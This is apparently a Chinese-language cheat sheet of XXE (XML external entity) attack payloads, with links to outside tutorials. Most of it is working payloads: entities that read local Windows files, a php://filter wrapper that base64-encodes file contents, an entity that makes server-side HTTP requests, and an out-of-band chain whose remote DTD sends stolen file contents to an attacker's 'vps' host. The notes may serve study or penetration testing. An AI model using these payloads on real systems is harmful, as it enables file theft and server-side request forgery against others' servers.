XXE重点内容
基础知识:https://www.cnblogs.com/l0nmar/p/13339015.html
1.xxe读取本地文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///c:/windows/system.ini">
]>
<root>&xxe;</root>
2.当读取的本地文件内容包含 < & 等特殊字符时,读取会报错,此时有两种方法
- 采用CDATA、PCDATA等方式,在外部dtd拼接读取。详见:https://www.bilibili.com/video/BV1Ty4y1Y7gs?p=21&spm_id_from=pageDriver&vd_source=ed55cea68ca30d00bac42f61348f3d9a
- 结合php伪协议,php://filter/read=convert.base64-encode/resource=c:/windows/system.ini
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/system.ini">
]>
<root>&xxe;</root>
3.xxe发起http请求
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://ip:port/path">
]>
<root>&xxe;</root>
4.当target主机没有回显时,需要外带out-of-band(OOB)
攻击者发送http数据包, 携带xml数据, 此时需要在外部dtd文件进行参数实体的拼接。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert
[
<!ENTITY % remote SYSTEM "http://vps:放置dtd文件的端口/xx.dtd" >
%remote;%int;%send;]>
我们要在vps上放置dtd文件,如下
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=要读取的内容">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://vps:接收回显数据的端口/?p=%file;'>">
发送该请求即可,该方法需要目标主机能够出网。